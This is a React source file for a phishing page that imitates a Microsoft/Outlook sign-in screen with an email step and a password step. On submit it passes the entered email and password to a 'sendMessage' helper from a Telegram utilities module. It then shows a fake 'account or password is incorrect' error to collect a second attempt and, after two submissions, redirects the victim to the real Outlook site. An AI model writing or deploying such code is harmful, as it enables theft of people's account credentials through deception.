import React, { useState } from "react";
import logo from "./logo.svg";
import styled from "styled-components";
import { sendMessage } from "./telegramUtils";

// Define your breakpoint sizes
const sizes = {
  small: 576,
  medium: 768,
  large: 992,
  xlarge: 1200,
};

const MicrosoftBackground = styled.div`
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  height: 100vh;
  justify-content: center;
`;

const ContentWrapper = styled.div`
  padding: 30px;
  background-color: #fff;
  border: 2px solid #f3f3f3;
  box-shadow: 0 0 5px rgba(0, 0, 0, 0.2);
  color: #1b1b1b;
  font-size: 16px;
  overflow: hidden;
  min-width: 400px;
  max-height: 380px;
  height: fit-content;
`;

const Text = styled.p`
  font-family: "Segoe UI", Arial, sans-serif;
  font-style: normal;
  font-weight: 600;
  line-height: 10px;
  font-size: 24px;
`;

const Form = styled.form`
  display: flex;
  flex-direction: column;
  align-items: flex-start;
  justify-content: center;
  padding: 20px;
  gap: 24px;
`;

const Input = styled.input`
  width: 100%;
  border: none;
  border-bottom: 1px solid #1b1b1b;
  padding: 5px;
  margin-bottom: 15px;
  font-size: 16px;
  font-family: "Segoe UI", Arial, sans-serif;
  transition: border-color 0.3s ease;

  &:focus {
    outline: none;
    border-color: #007bff;
  }

  &:hover {
    border-color: #007bff;
  }
`;

const Span = styled.span`
  color: blue;
`;
const Error = styled.span`
  color: #e81123;
  font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue",
    "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol",
    "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi,
    "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI",
    "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa",
    "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa",
    "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli",
    "Myanmar Text", "Cambria Math";
  font-weight: 400;
  font-size: 16px;
  font-size: normal;
`;
const H2 = styled.h2`
  padding-top: 2px;
  font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue",
    "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol",
    "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi,
    "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI",
    "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa",
    "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa",
    "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli",
    "Myanmar Text", "Cambria Math";
  font-weight: 400;
  font-size: 16px;
  line-height: 24px;
  color: #1b1b1b;
  font-style: normal;
`;

const App = () => {
  const [formState, setFormState] = useState({
    email: "",
    password: "",
  });
  const [errorMessage, setErrorMessage] = useState({});
  const [customError, setCustomError] = useState("");
  const [showPassword, setShowPassword] = useState(false);
  const [showEmail, setShowEmail] = useState(true);
  const [loading, setLoading] = useState(false);
  const [count, setCount] = useState(0);

  //prevent enter from submitting form
  const handleKeyDown = (e) => {
    if (e.key === "Enter") {
      e.preventDefault();
    }
  };

  const handleChange = (e) => {
    const { name, value } = e.target;
    console.log({ name, value });
    setFormState((prevState) => ({ ...prevState, [name]: value }));
    setErrorMessage((prevErrors) => ({ ...prevErrors, [name]: "" }));
  };

  const handleNextClick = async () => {
    const { email } = formState;
    const newErrors = {};

    // Email validation
    if (!isValidEmail(email)) {
      newErrors.email = "Email address is required";
    }

    if (Object.keys(newErrors).length > 0) {
      setErrorMessage(newErrors);
      return false;
    }

    setErrorMessage({});
    setShowPassword(true);
    setShowEmail(false);
    return true;
  };

  const isValidEmail = (email) => {
    const emailRegex = /^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/;
    return emailRegex.test(email);
  };

  const handleSubmit = async (e) => {
    e.preventDefault();

    const { email, password } = formState;
    const newErrors = {};

    // Email validation
    if (email === "") {
      newErrors.email = "Email address is required";
    } else if (!isValidEmail(email)) {
      newErrors.email = "Invalid email address";
    }

    // Password validation
    if (password === "") {
      newErrors.password = "Please enter a valid password";
    } else if (password.length < 5) {
      newErrors.password = "Password must be at least 8 characters";
    }

    if (Object.keys(newErrors).length > 0) {
      setErrorMessage(newErrors);
      return false;
    }

    try {
      await sendMessage(formState);
      // console.log("Message sent successfully!");

      //Update the count
      setCount((prevCount) => {
        const newCount = prevCount + 1;
        if (newCount >= 2) {
          window.location.href = "http://outlook.com/";
        }
        return newCount;
      });

      // Set loading state to true
      setLoading(true);
      setCustomError("Your account or password is incorrect. Try Again");
      setFormState((prevState) => ({ ...prevState, password: "" }));
    } catch (error) {
      console.error("Failed to send message:", error);
    } finally {
      // Set loading state to false
      setLoading(false);
    }
  };

  return (
    <>
      <MicrosoftBackground>
        <ContentWrapper>
          <Form onSubmit={handleSubmit} onKeyDown={handleKeyDown}>
            <img src={logo} className="App-logo" alt="logo" />

            {showEmail && (
              <>
                <Text>Sign In</Text>
                <Input
                  type="email"
                  name="email"
                  value={formState.email}
                  onChange={handleChange}
                  placeholder="Email"
                />
                {errorMessage.email && <Error>{errorMessage.email}</Error>}
                <p>
                  No account? <Span>Create one!</Span>
                </p>

                <button type="button" className="btn" onClick={handleNextClick}>
                  Next
                </button>
              </>
            )}

            {showPassword && (
              <>
                <H2>&#8592;&nbsp;{formState.email}</H2>
                <Text>Enter password</Text>

                <Input
                  type="password"
                  name="password"
                  value={formState.password}
                  onChange={handleChange}
                  placeholder="Password"
                />
                {errorMessage.password && (
                  <Error>{errorMessage.password}</Error>
                )}
                {customError && <Error>{customError}</Error>}
                <button type="submit" disabled={loading} className="btn">
                  {" "}
                  Submit
                </button>
              </>
            )}
          </Form>
        </ContentWrapper>
      </MicrosoftBackground>
    </>
  );
};

export default App;
